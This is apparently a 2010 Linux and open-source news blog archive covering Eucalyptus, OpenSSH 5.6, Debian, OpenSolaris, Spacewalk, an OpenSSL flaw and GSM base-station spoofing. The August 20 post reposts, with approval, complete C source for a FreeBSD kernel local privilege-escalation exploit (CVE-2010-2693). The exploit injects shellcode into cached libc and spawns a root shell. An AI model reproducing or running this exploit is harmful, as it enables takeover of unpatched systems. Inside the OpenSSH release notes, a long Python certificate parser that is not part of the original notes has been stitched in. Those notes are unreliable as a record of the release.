Aug 27 2010

Eucalyptus Builds Scalability Into Private Clouds

Eucalyptus Systems, supplier of Amazon EC2-compatible software for building the private cloud, has brought out version 2.0 of its Eucalyptus open source system.

The Santa Barbara, Calif., company was set up to support the output of the Eucalyptus open source project, which originated in the University of California at Santa Barbara’s computer science department. Prof. Rich Wolski and associates produced interfaces compatible with Amazon Web Services’ EC2 APIs and packaged them together as a way to start building out an enterprise cloud.

Eucalyptus 2.0 is the second major release of the open source code. In it, “we have improved scalability all over the product,” said Marten Mickos, CEO, in an interview. The firm provides technical support for Eucalyptus open source code. The open source version is not to be confused with the Eucalyptus commercial Enterprise edition, also labeled 2.0, although that is based on a pre-2.0 version of the open source code.

The Eucalyptus open source code is issued under the GPL, contains features and functions ahead of the Enterprise edition, and can be freely downloaded. The firm is seeing 12,000 downloads in peak months and Eucalyptus is included in Canonical’s Ubuntu Linux distribution, he said.

Eucalyptus scales across a larger server cluster more easily because the 2.0 version “has been clearer about the segregation of tasks. We no longer locate the cluster controller and the node controller on the same node,” where they sometimes ended up in contention over resources, Mickos noted. The former CEO of MySQL, now part of Oracle, joined Eucalyptus Systems in March.

Version 2.0 supports iSCSI disks as elastic block store volumes and allows the cloud builder to place an iSCSI storage controller on any server in a cluster, including outside the cloud domain of the cluster, if he chooses, Mickos said.

Version 2.0 also supports the open source virtio, an API for virtualizing I/O that is used by the open source KVM hypervisor. KVM is included in distributions of Red Hat Enterprise Linux and Novell’s SUSE Linux Enterprise System. Virtio uses a common set of I/O virtualization drivers that are both efficient and potentially adaptable for use by other hypervisor suppliers, Mickos said. Virtual I/O consists of a virtual machine sending both its communications traffic and storage traffic through the hypervisor to a virtual device, rather than through a server’s network interface card or host bus adapter. From the virtual device, it can be moved off the virtualized server into the network fabric and handled more efficiently there.

Eucalyptus 2.0 also supports retrieval of specific versions of objects stored in Walrus, the Eucalyptus storage system that is compatible with Amazon’s S3 storage service. Users may perform version control on objects as they are stored in Walrus and retrieve a specific version, as needed.

Eucalyptus to some extent now mimics the slogan of the OpenStack project, started recently by Rackspace, which claims it’s building governance software for a million-node cloud, a prospect that even the largest service providers have yet to attain.

“Sure Eucalyptus can support a million-node cloud, but the more important question is how large an application can you run on your cloud” and how effectively can you manage it there with your cloud software. Eucalyptus is concentrating on effective management for private clouds, not massive public infrastructure providers, Mickos said.

Source


Aug 23 2010

OpenSSH 5.6 released

OpenSSH 5.6 has just been released. It will be available from the
mirrors listed at http://www.openssh.com/ shortly.

OpenSSH is a 100% complete SSH protocol version 1.3, 1.5 and 2.0
implementation and includes sftp client and server support.

Once again, we would like to thank the OpenSSH community for their
continued support of the project, especially those who contributed
code or patches, reported bugs, tested snapshots or donated to the
project. More information on donations may be found at:

http://www.openssh.com/donations.html

Changes since OpenSSH 5.5
=========================

Features:

* Added a ControlPersist option to ssh_config(5) that automatically
starts a background ssh(1) multiplex master when connecting. This
connection can stay alive indefinitely, or can be set to
automatically close after a user-specified duration of inactivity.

* Hostbased authentication may now use certificate host keys. CA keys
must be specified in a known_hosts file using the @cert-authority
marker as described in sshd(8).

* ssh-keygen(1) now supports signing certificates using a CA key that
has been stored in a PKCS#11 token.

* ssh(1) will now log the hostname and address that we connected to at
LogLevel=verbose after authentication is successful to mitigate
“phishing” attacks by servers with trusted keys that accept
authentication silently and automatically before presenting fake
password/passphrase prompts.

Note that, for such an attack to be successful, the user must have
disabled StrictHostKeyChecking (enabled by default) or an attacker
must have access to a trusted host key for the destination server.

* Expand %h to the hostname in ssh_config Hostname options. While this
sounds useless, it is actually handy for working with unqualified
hostnames:

Host *.*
Hostname %h
Host *
Hostname %h.example.org

* Allow ssh-keygen(1) to import (-i) and export (-e) of PEM and PKCS#8
keys in addition to RFC4716 (SSH.COM) encodings via a new -m option
(bz#1749)

* sshd(8) will now queue debug messages for bad ownership or
permissions on the user’s keyfiles encountered during authentication
and will send them after authentication has successfully completed.
These messages may be viewed in ssh(1) at LogLevel=debug or higher.

* ssh(1) connection multiplexing now supports remote forwarding with
dynamic port allocation and can report the allocated port back to
the user:

LPORT=`ssh -S muxsocket -R0:localhost:25 -O forward somehost`

* sshd(8) now supports indirection in matching of principal names
listed in certificates. By default, if a certificate has an
embedded principals list then the username on the server must match
one of the names in the list for it to be accepted for
authentication.

sshd(8) now has a new AuthorizedPrincipalsFile option to specify a
file containing a list of names that may be accepted in place of the
username when authorizing a certificate trusted via the
sshd_config(5) TrustedCAKeys option. Similarly, authentication
using a CA trusted in ~/.ssh/authorized_keys now accepts a
principals="name1[,name2,...]" to specify a list of permitted names.

If either option is absent, the current behaviour of requiring the
username to appear in principals continues to apply. These options
are useful for role accounts, disjoint account namespaces and
“user@realm”-style naming policies in certificates.

* Additional sshd_config(5) options are now valid inside Match blocks:

AuthorizedKeysFile
AuthorizedPrincipalsFile
HostbasedUsesNameFromPacketOnly
PermitTunnel

* Revised the format of certificate keys. The new format, identified as
ssh-{dss,rsa}-cert-v01@openssh.com, includes the following changes:

- Adding a serial number field. This may be specified by the CA at
the time of certificate signing.

- Moving the nonce field to the beginning of the certificate where
it can better protect against chosen-prefix attacks on the
signature hash (currently infeasible against the SHA1 hash used)

- Renaming the "constraints" field to "critical options"

- Adding a new non-critical "extensions" field. The "permit-*"
options are now extensions, rather than critical options, to
permit non-OpenSSH implementations of this key format to degrade
gracefully when encountering keys with options they do not
recognize.

The older format is still supported for authentication and may still
be used when signing certificates (use "ssh-keygen -t v00 ...").
The v00 format, introduced in OpenSSH 5.4, will be supported for at
least one year from this release, after which it will be deprecated
and removed.
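The two items above describe a wire layout and a matching rule. The following is an added example, not OpenSSH's own code: it builds a constructed ssh-rsa-cert-v01@openssh.com blob (placeholder key material and signature, no real CA), parses the v01 field order (nonce first, serial, critical options, extensions), and applies the principal rule from the sshd(8) item, including the indirection an AuthorizedPrincipalsFile or principals="..." list provides. The field order is the one OpenSSH documents in PROTOCOL.certkeys; the function names, the sample values and the small set of "known" critical options are this example's own assumptions.

```python
import struct

CERT_TYPES = ("ssh-rsa-cert-v01@openssh.com", "ssh-dss-cert-v01@openssh.com")
KNOWN_CRITICAL = {"force-command", "source-address"}  # critical options sshd knows


def _string(b):
    # SSH wire "string": uint32 big-endian length, then the bytes
    return struct.pack(">I", len(b)) + b


def _option_map(opts):
    # critical options / extensions: (string name, string data) pairs; data is
    # itself a wrapped string, or empty for flag options such as permit-pty
    body = b""
    for name, value in sorted(opts.items()):
        body += _string(name.encode()) + _string(_string(value.encode()) if value else b"")
    return _string(body)


def build_cert_v01(nonce, serial, key_id, principals, critical, extensions):
    # Constructed user certificate: key material, CA key and signature are
    # placeholders, so the blob only demonstrates the v01 field layout.
    return (_string(b"ssh-rsa-cert-v01@openssh.com")
            + _string(nonce)                                # nonce now comes first
            + _string(b"\x01\x00\x01") + _string(b"\x00\xc0\xff\xee")  # mpint e, n
            + struct.pack(">Q", serial)                     # new serial field
            + struct.pack(">I", 1)                          # 1 = user certificate
            + _string(key_id.encode())
            + _string(b"".join(_string(p.encode()) for p in principals))
            + struct.pack(">QQ", 0, 0xFFFFFFFFFFFFFFFF)     # valid after / before
            + _option_map(critical)                         # formerly "constraints"
            + _option_map(extensions)                       # new non-critical field
            + _string(b"")                                  # reserved
            + _string(b"placeholder-ca-key") + _string(b"placeholder-signature"))


class _Reader:
    # Cursor over a wire blob; every read checks it stays inside the data.
    def __init__(self, data):
        self.data, self.off = data, 0

    def take(self, n):
        chunk = self.data[self.off:self.off + n]
        if len(chunk) != n:
            raise ValueError("truncated certificate")
        self.off += n
        return chunk

    def u32(self): return struct.unpack(">I", self.take(4))[0]
    def u64(self): return struct.unpack(">Q", self.take(8))[0]
    def string(self): return self.take(self.u32())
    def done(self): return self.off == len(self.data)


def _parse_map(blob):
    r, out = _Reader(blob), {}
    while not r.done():
        name, data = r.string().decode(), r.string()
        out[name] = _Reader(data).string().decode() if data else ""
    return out


def parse_cert_v01(blob):
    # Split a v01 certificate into its fields; the signature is not verified here.
    r = _Reader(blob)
    cert = {"type": r.string().decode()}
    if cert["type"] not in CERT_TYPES:
        raise ValueError("not a v01 certificate: " + cert["type"])
    cert["nonce"] = r.string()
    for _ in range(2 if "rsa" in cert["type"] else 4):
        r.string()                                          # public key mpints
    cert["serial"], cert["cert_type"] = r.u64(), r.u32()
    cert["key_id"] = r.string().decode()
    names, cert["principals"] = _Reader(r.string()), []
    while not names.done():
        cert["principals"].append(names.string().decode())
    cert["valid_after"], cert["valid_before"] = r.u64(), r.u64()
    cert["critical"] = _parse_map(r.string())
    cert["extensions"] = _parse_map(r.string())
    r.string()                                              # reserved
    cert["signature_key"], cert["signature"] = r.string(), r.string()
    if not r.done():
        raise ValueError("trailing bytes after signature")
    return cert


def unknown_critical_options(cert):
    # An unrecognised critical option must make the key unusable; unrecognised
    # extensions are ignored, which is why permit-* moved to extensions.
    return sorted(set(cert["critical"]) - KNOWN_CRITICAL)


def accept_cert(cert, username, allowed_principals=None):
    # Rule from the release notes: with an embedded principals list the login
    # name must appear in it, unless AuthorizedPrincipalsFile (or a
    # principals="..." key option) supplies names accepted in its place.
    if unknown_critical_options(cert):
        return False
    if not cert["principals"]:
        return True                                         # no list, no name check
    wanted = [username] if allowed_principals is None else list(allowed_principals)
    return any(p in cert["principals"] for p in wanted)
```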

BugFixes:

* The PKCS#11 code now retries a lookup for a private key if there is
no matching key with CKA_SIGN attribute enabled; this fixes
MuscleCard support (bz#1736)

* Unbreak strdelim() skipping past quoted strings (bz#1757). For
example, the following directive was not parsed correctly:

AllowUsers "blah blah" blah

* sftp(1): fix swapped args in upload_dir_internal(), breaking
recursive upload depth checks and causing verbose printing of
transfers to always be turned on (bz#1797)

* Fix a longstanding problem where if you suspend scp(1) at the
password/passphrase prompt the terminal mode is not restored.

* Fix a PKCS#11 crash on some smartcards by validating the length
returned for C_GetAttributeValue (bz#1773)

* sftp(1): fix ls in working directories that contain globbing
characters in their pathnames (bz#1655)

* Print warning for missing home directory when ChrootDirectory=none
(bz#1564)

* sftp(1): fix a memory leak in do_realpath() error path (bz#1771)

* ssh-keygen(1): Standardise error messages when attempting to open
private key files to include "progname: filename: error reason"
(bz#1783)

* Replace verbose and overflow-prone Linebuf code with
read_keyfile_line() (bz#1565)

* Include the user name on “subsystem request for …” log messages

* ssh(1) and sshd(8): remove hardcoded limit of 100 permitopen clauses
and port forwards per direction (bz#1327)

* sshd(8): ignore stderr output from subsystems to avoid hangs if a
subsystem or shell initialisation writes to stderr (bz#1750)

* Skip the initial check for access with an empty password when
PermitEmptyPasswords=no (bz#1638)

* sshd(8): fix logspam when key options (from="..." especially) deny
non-matching keys (bz#1765)

* ssh-keygen(1): display a more helpful error message when $HOME is
inaccessible while trying to create .ssh directory (bz#1740)

* ssh(1): fix hang when terminating a mux slave using ~. (bz#1758)

* ssh-keygen(1): refuse to generate keys longer than
OPENSSL_[RD]SA_MAX_MODULUS_BITS, since we would refuse to use
them anyway (bz#1516)

* Suppress spurious tty warning when using -O and stdin is not a tty
(bz#1746)

* Kill channel when pty allocation requests fail. Fixed stuck client
if the server refuses pty allocation (bz#1698)

Portable OpenSSH Bugfixes:

* sshd(8): increase the maximum username length for login recording
to 512 characters (bz#1579)

* Initialize the values to be returned from PAM to sane values in
case the PAM method doesn’t write to them. (bz#1795)

* Let configure find OpenSSL libraries in a lib64 subdirectory.
(bz#1756)

Checksums:
==========

- SHA1 (openssh-5.6.tar.gz) = fa5ac394b874d6709031306b6ac5c48399697f7f
- SHA1 (openssh-5.6p1.tar.gz) = 347dd39c91c3529f41dae63714d452fb95efea1e

Reporting Bugs:
===============

- Please read http://www.openssh.com/report.html
Security bugs should be reported directly to openssh@openssh.com

OpenSSH is brought to you by Markus Friedl, Niels Provos, Theo de Raadt,
Kevin Steves, Damien Miller, Darren Tucker, Jason McIntyre, Tim Rice and
Ben Lindstrom.

Source


Aug 20 2010

Really nice work from Jon.

/*
* cve-2010-2693.c
*
* FreeBSD Kernel 7.x/8.x mbuf M_RDONLY Privilege Escalation
* Jon Oberheide
* http://jon.oberheide.org
*
* Information:
*
* http://security.freebsd.org/advisories/FreeBSD-SA-10:07.mbuf.asc
*
* The read-only flag is not correctly copied when a mbuf buffer reference
* is duplicated. When the sendfile(2) system call is used to transmit
* data over the loopback interface, this can result in the backing pages
* for the transmitted file being modified, causing data corruption.
*
* Usage:
*
* $ gcc cve-2010-2693.c -o cve-2010-2693 -lpthread
* $ ./cve-2010-2693
* …
* # id
* uid=0(root) …
*
* Notes:
*
* Exploiting the mbuf vulnerability, we corrupt the in-memory copy of libc
* stored in the filesystem buffer cache with some shellcode. In particular,
* we overwrite getuid with a sled + mov $0x0,%eax + ret. Then, we spawn the
* setuid ‘su’ to get an instant root shell.
*
* The libc copy in the fs buffer cache will stick around for a while so you
* might want to remount/reboot after you’re done with your root shell.
*
* Kingcope beat me to this one by a long shot but I might as well still
* release it since it takes a slightly different approach. :-)
*
* Tested on FreeBSD 8.0-RELEASE, but should work on any unpatched 7.x/8.x.
*/

#include
#include
#include
#include
#include
#include
#include
#include

#include

#include

#define SHELLCODE "\xb8\x00\x00\x00\x00\xc3"
#define SHELLCODE_LEN 6

void *
run_listener(void *arg)
{
char buf[4096];
int ret, sock, conn;
struct sockaddr_in addr;

sock = socket(AF_INET, SOCK_STREAM, 0);
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(2693);
addr.sin_addr.s_addr = inet_addr("127.0.0.1");

ret = bind(sock, (struct sockaddr *) &addr, sizeof(addr));
if (ret < 0) {
printf("[-] couldn't bind to listener socket\n");
exit(1);
}

ret = listen(sock, 1);
if (ret < 0) {
printf("[-] couldn't listen on socket\n");
exit(1);
}

conn = accept(sock, NULL, NULL);
if (conn < 0) {
printf("[-] couldn't accept incoming connection\n");
exit(1);
}

while(1) {
ret = read(conn, &buf, sizeof(buf));
if (ret < 0) {
break;
}
}

return NULL;
}

int
main(int argc, char *argv[])
{
FILE *fp;
char libc[64];
int ret, sock, fd, fsize, flags, chunk = 0;
int getuid, offset, writes;
off_t bytes, sent = 0;
struct sockaddr_in addr;
struct stat statbuf;
pthread_t listener;
fd_set wset;

char sc[256 + SHELLCODE_LEN];
memset(sc, 0x90, sizeof(sc));
memcpy(sc + (sizeof(sc) - SHELLCODE_LEN), SHELLCODE, SHELLCODE_LEN);

printf("[+] checking for setuid /usr/bin/su binary...\n");

ret = stat("/usr/bin/su", &statbuf);
if (ret < 0) {
printf("[-] couldn't find setuid /usr/bin/su binary!\n");
exit(1);
}

printf("[+] checking for suitable libc library in /lib...\n");

memset(libc, 0x0, sizeof(libc));
fp = popen("ls -1 /lib/libc.so.*", "r");
fscanf(fp, "%s", libc);
fclose(fp);

printf("[+] found libc at %s\n", libc);

fp = popen("nm -D /lib/libc.so.* | grep \"W getuid\"", "r");
fscanf(fp, "%x", &getuid);
fclose(fp);

printf("[+] found getuid function at 0x%08x\n", getuid);

offset = getuid - 2048;
writes = offset / 256;

printf("[+] target: 0x%08x, adjusted: 0x%08x, writes: %d\n", getuid, offset, writes);

printf("[+] spawning listener thread...\n");

if (pthread_create(&listener, NULL, run_listener, NULL) != 0){
printf("[-] couldn't create listener thread!\n");
exit(1);
}
sleep(3);

printf("[+] connecting to listener thread...\n");

sock = socket(AF_INET, SOCK_STREAM, 0);
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(2693);
addr.sin_addr.s_addr = inet_addr("127.0.0.1");

ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));
if (ret < 0) {
printf("[-] couldn't connect to listening thread!\n");
exit(1);
}

printf("[+] initiating exploit via sendfile...\n");

fd = open(libc, O_RDONLY);
if (fd < 0) {
printf("[-] couldn't open target libc library!\n");
exit(1);
}

ret = fstat(fd, &statbuf);
if (ret < 0) {
printf("[-] couldn't stat target libc library!\n");
exit(1);
}

fsize = statbuf.st_size;
flags = fcntl(fd, F_GETFL);
flags |= O_NONBLOCK;
fcntl(fd, F_SETFL, flags);

while (fsize > 0) {
FD_ZERO(&wset);
FD_SET(sock, &wset);
ret = select(fd + 1, NULL, &wset, NULL, NULL);
if (ret < 0) {
continue;
}

if (chunk > 0) {
bytes = 0;
ret = sendfile(fd, sock, 256 * writes, chunk, NULL, &bytes, 0);
if (ret < 0) {
continue;
}
chunk -= bytes;
fsize -= bytes;
sent += bytes;
continue;
}

chunk = 2048;
write(sock, sc, sizeof(sc));
}

printf("[+] exploit complete!\n");
printf("[+] spawning root shell...\n");

system("su");

return 0;
}

Source


Aug 16 2010

Novell Sends SUSE Linux To Amazon Cloud

Novell disclosed details of a deal with Amazon Web Services (AWS) to provide hourly pricing and support services for SUSE Linux Enterprise Server (SLES) 10 and 11 on Amazon Elastic Compute Cloud (Amazon EC2). The announcement was made last week at LinuxCon in Boston.

Under the contract, both end customers and independent software vendors will pay only for the hours of SLES they use. In addition, Novell is providing a maintenance contract on AWS to allow customers to keep SLES current with bug fixes, patches, and features.

Amazon EC2 customers can buy maintenance subscriptions for enterprise Linux directly on Amazon’s site without signing a separate license agreement, according to Novell.

“Amazon Web Services provides enterprise customers with secure, reliable, and utility-priced computing infrastructure as an on-demand service,” said Terry Wise, director of business development at AWS, in a statement. “We are pleased to see Novell providing an easy way for customers to leverage the enterprise class SUSE Linux distribution on the Amazon EC2 platform. This offering provides enterprise customers and ISVs with a commercially maintained and supported Linux distribution that is easy-to-use and purchase.”

Novell solution providers participating in the developer’s SUSE Cloud Program can resell Novell technical support or offer customers their own support services, backed by Novell’s offerings. Under the SUSE Cloud Program, Novell provides partners with certified Linux applications, a versatile Linux platform, and SUSE Studio, a solution for building cloud-based workloads, said Markus Rex, senior VP and general manager of open platform solutions at the company.

AWS, which expects to hit the $20-billion mark, joins service providers such as Fujitsu, IBM, Tencent, and Vodacom Business in the SUSE Cloud Program. The program includes more than 5,000 ISV applications, according to Novell.

“We are pleased that industry leaders like Amazon Web Services are able to leverage the SUSE Cloud Program to provide even more choices to their customers,” Rex said in a statement.

Source


Aug 16 2010

Debian 6.0 on Track for December Release

After several delays and many months behind schedule, Debian 6.0 appears to be one step closer to release. As of August 6, the testing branch is frozen except for fixes and translation updates. This puts the final release on track for possibly the end of the year.

Neil McGovern, Debian Release Team manager, wrote in from DebConf10 in New York to announce this milestone for Debian 6.0. The freeze had been delayed until the Python 2.6 migration and the glibc update were completed. Now, as a general rule, only critical bug fixes, documentation changes, and translation updates will be accepted into the testing branch. This gives developers the opportunity to polish 6.0 for final release. The last two major versions each saw a four-month stabilization period before final release, which suggests 6.0 will arrive sometime in December.

It was over a year ago that Debian developers announced a fixed release schedule much like those of other popular Linux distributions, but scheduling freeze dates every two years instead of release dates. 6.0 was scheduled to be frozen in December 2009, with final release estimated for spring of this year. The freeze was delayed at that time due to a large number of critical bugs, and while the number has decreased, it is still quite high at 554 affecting Squeeze. That number could very well delay release until early spring 2011.

The upcoming release will bring some exciting changes. Startup, Debian’s version of Upstart, is a parallel booting system that will bring faster system starts. GNOME 2.30, KDE 4.4.5, Linux 2.6.32, X.org 7.5, GCC 4.4, and OpenOffice 3.2.1 are on the menu as well.

Live Squeeze Alpha2 was released July 22.

Source


Aug 16 2010

Farewell To OpenSolaris. Oracle Just Killed It Off

Oracle has finally announced its plans for the Solaris operating system and the OpenSolaris platform, and it’s not good. OpenSolaris is now effectively dead and there will not be any more OpenSolaris releases — including the long-delayed 2010 release. Solaris will live on: Oracle is busy working on Solaris 11 for a release next year, and there will be a “Solaris 11 Express” as a product similar to OpenSolaris, but it will only ship after Oracle’s enterprise release.

Oracle had been quiet for months about its OpenSolaris plans, to the point that the OpenSolaris governing board was going to dissolve itself this month if Oracle didn’t come clean about its intentions (now Oracle has effectively put a bullet in its head instead), and earlier this month the Illumos project turned its lights on as effectively a fork of OpenSolaris.

This Solaris road-map was communicated in an internal Oracle e-mail, which has since leaked onto the Internet and can be found on the OpenSolaris mailing list.

Source


Aug 16 2010

Spacewalk 1.1 has been released

Hello everyone,

Spacewalk 1.1 has been released!

Server:

* http://spacewalk.redhat.com/yum/1.1/RHEL/5//
* http://spacewalk.redhat.com/yum/1.1/Fedora/12//
* http://spacewalk.redhat.com/yum/1.1/Fedora/13//

Client:

* http://spacewalk.redhat.com/yum/1.1-client/RHEL/5//
* http://spacewalk.redhat.com/yum/1.1-client/Fedora/12//
* http://spacewalk.redhat.com/yum/1.1-client/Fedora/13//

For new installations, consult:

* https://fedorahosted.org/spacewalk/wiki/HowToInstall

For upgrades, consult:

* https://fedorahosted.org/spacewalk/wiki/HowToUpgrade

Features and enhancements:

* First Spacewalk release built in a publicly available build system
- http://koji.spacewalkproject.org/koji

* Spacewalk 1.1 runs on Fedora 13

* Introduction of spacecmd, a command line interface to Spacewalk
- https://fedorahosted.org/spacewalk/wiki/spacecmd

* Support for synchronization of comps files
- https://fedorahosted.org/spacewalk/wiki/Features/CompsSyncing

* support for staging content
- ability to have all updates pulled off Spacewalk onto registered
systems prior to the start of maintenance window

* support for eliminating orphaned (duplicate) profiles
- https://fedorahosted.org/spacewalk/wiki/DuplicateProfiles

* new API calls:
- channel.software.getChannelLastBuildById
- configchannel.listSubscribedSystems
- kickstart.profile.downloadRenderedKickstart
- org.setSoftwareFlexEntitlements
- schedule.rescheduleActions
- system.convertToFlexEntitlement
- system.deletePackageProfile
- system.deleteSystem
- system.listDuplicatesByHostname
- system.listDuplicatesByIp
- system.listDuplicatesByMac
- system.listEligibleFlexGuests
- system.listFlexGuests
- system.listLatestAvailablePackage
- system.listPackageProfiles
- systemgroup.scheduleApplyErrataToActive

* localization updates

Known issues:

* Wrong tomcat6 directory permissions on Fedora 13
- https://bugzilla.redhat.com/show_bug.cgi?id=574593
- https://bugzilla.redhat.com/show_bug.cgi?id=586364
- https://bugzilla.redhat.com/show_bug.cgi?id=605335
- workaround:
chmod g+w /var/log/tomcat6 /etc/tomcat6/Catalina/localhost \
/var/cache/tomcat6 /var/cache/tomcat6/temp /var/cache/tomcat6/work

* cobbler-related SELinux denials on Fedora 12 and Fedora 13:
- https://bugzilla.redhat.com/show_bug.cgi?id=620503
- https://bugzilla.redhat.com/show_bug.cgi?id=621095
- solution: install updated selinux-policy-targeted as noted in
the above bugs

* Deprecation warning during osa-dispatcher start on Fedora 12
and Fedora 13:
- https://bugzilla.redhat.com/show_bug.cgi?id=621204
- https://bugzilla.redhat.com/show_bug.cgi?id=621206

* Documentation search does not work, other searches are unaffected

Contributors:

Thank you goes out to the following people who contributed to
Spacewalk 1.1 release:

* Aron Parsons
* Colin Coe
* James Hogarth
* Joshua Roys
* Lukáš Ďurfina
* Maxim Burgerhout
* Paul Morgan
* Satoru SATOH

Regards
Milan Zázrivec

Source


Aug 10 2010

Vulnerability in OpenSSL 1.0.x

Security expert Georgi Guninski has pointed out a security issue in the 1.0 branch of OpenSSL that potentially allows SSL servers to compromise clients. Apparently the hole can be exploited simply by sending a specially crafted certificate to the client, causing already-freed memory to be accessed in the ssl3_get_key_exchange function (in ssl/s3_clnt.c). While this usually only crashes the application, it could potentially also be exploited to execute injected code.

Guninski included a certificate and a flawed key for reproducing the problem in the report he released on the Full Disclosure mailing list. When tested briefly by The H’s associates at heise Security on a current Ubuntu 10.04 system with OpenSSL 0.9.8k, a certificate belonging to an RSA key of only 4006 bits in length (and where q is not prime) only produced a warning that the certificate was flawed.

As virtually none of the Linux distributions use OpenSSL 1.0.x, the hole is unlikely to create major concerns. An update has yet to be released by the OpenSSL developers, but the issue is already being discussed on the OpenSSL developer mailing list.

Source


Aug 6 2010

This is why people think Linux/OSS people are elitists…

So normally Linux User Groups (LUGs) are a safe haven for Q&A. Not tonight. Tonight a CentOS developer named Russ Herrold needed a soapbox. He took what is an often-asked question of any distribution, “Why don’t the packages remain more up-to-date?”, and used it not only to be a complete asshole about the matter, but even linked the mailing list to a CentOS newsletter with his featurette/biography.

For what it’s worth, the question had been answered a few times before this e-mail was even sent, in much nicer and more helpful ways. To be fair, Larry got a bit over-excited in the first place, but having a CentOS developer reply like this is strikingly unnecessary.

Please Linux developers and OSS contributors around the world, don’t be this guy.

Date: Fri, 6 Aug 2010 18:56:18 -0400 (EDT)
From: R P Herrold
To: Larry Siden
cc: LUGWASH
Subject: [WLUG] out-of-date packages on Redhat/Centos

On Thu, 5 Aug 2010, Larry Siden wrote:

> I’ve been using Linux at home for about 7 or 8 years now, first with Gentoo
> (for masochists, I assure you!), and then Ubuntu (so I could have a life
> again). Now I’m beginning to work on several apps on hosted sites that uses
> RH/Centos (I’m not sure which, I just know that I have to install everything
> with yum). When I got my own VPS, I had a choice between Centos and Ubuntu
> 8.10 (again, out-of-date!) and I chose Centos so that I could get to know it
> better.
>
> Whats been “grinding my gears” is that almost everything I use in my day to
> day work is out-of-date.
… snip rant …
> Is there a reason everything has to be so f@#$king out of date on Centos
> installs? Are there more current repositories that I can point yum to, at
> least on the systems I have root access to, without breaking anything?

Well, several reasons actually. Take a deep breath or six if
it ‘grinds your gears’ and consider WHY RHEL/CentOS exist

CentOS is a distribution intended for people who consider a
computer a tool for getting a function done, rather than a toy
to be played with. It does not hurt the CentOS folks feelings
a bit that you want more — but you are not gonna’ get it from
CentOS — perhaps from the adjunct archives mentioned. It is
just not our mission nor goal to cater to such

RHEL, and CentOS are for people who just want a system to run
[and run and run and run, for a seven year span without
physically touching the unit if need be], to be securable, to
have regular updates, and dont feel the need to chase the
latest fad

As a production colo, or VPS unit is going to (properly
adminned) NOT have a GUI interface, I don’t even notice the
window manager ‘art’ or colors it might use when started in X
– it is never going to be in R/L 5 anyway. I don’t care it
lacks an audio player by default that handles patent
encumbered MP3 support as the fans in the DC drown out good
listening anyway. I don’t care it give a hoot that wireless
support is a PITA, as it is going to be running all packets
over wired ethernet anyway. I LIKE IT that volatile devices
such as USB thumb drives require me to mount them (as I am
going to remove the automounter, anyway) to prevent casual
exposure of data

We have full doco at: http://www.centos.org/docs/, a ton of
original content at http://wiki.centos.org/, forums, mailing
lists, IRC support channels, and more.

Not for everyone, just for folks who don’t want to spend time
tending computers, and would rather get work done.

see:

http://wiki.centos.org/Newsletter/0904

bullet 5

– Russ herrold
herrold@centos.org


Aug 2 2010

Hacking into GSM for only $1500

A researcher at the DefCon hackers’ meet has demonstrated kit for spoofing GSM base stations, allowing even those on a limited budget to intercept phone calls and text messages.

The audience attending the talk by Chris Paget were able to see their own handsets transferring to his spoofed base station, with calls receiving a recorded message explaining that the security had been compromised, Associated Press reports. The demonstration would presumably have been a lot less impressive if Las Vegas had better 3G coverage.

The basis of the attack isn’t new: the attacker sets up a base station advertised as belonging to a compatible network operator, and nearby handsets switch to the stronger signal. In a live attack the base station then connects to the real cellular network and passes authentication tokens back and forth as though it weren’t there.

GSM communications are supposed to be encrypted between the genuine network and the handset, but in some countries strong encryption isn’t allowed, so the network tells the handset not to encrypt the communications. The handset is supposed to pop up a warning when this happens, but doesn’t, so rogue base stations can ask the handset not to encrypt anything and then listen in.

The 2G GSM standard does not mandate mutual authentication – the handset must prove its identity to the network, but the network is not required to return the favour. That has always left 2G networks open to this kind of abuse; the only difference is that the kit to do it has got a lot cheaper over the years. 3G standards do require such authentication, so they are immune from this kind of attack.

During the demonstration, Paget pointed out that one could jam the 3G signal (at 2.1GHz), forcing handsets to drop back to 2G and open themselves to the vulnerability. That’s true, but will cease to be possible (or at least will get a lot more difficult) once operators start deploying 3G technology on the 2G frequencies.

“GSM is broken – it’s just plain broken,” said Paget during the demonstration, though he could have added that the standard is no more broken than it was yesterday – the break just got cheaper to exploit.

Source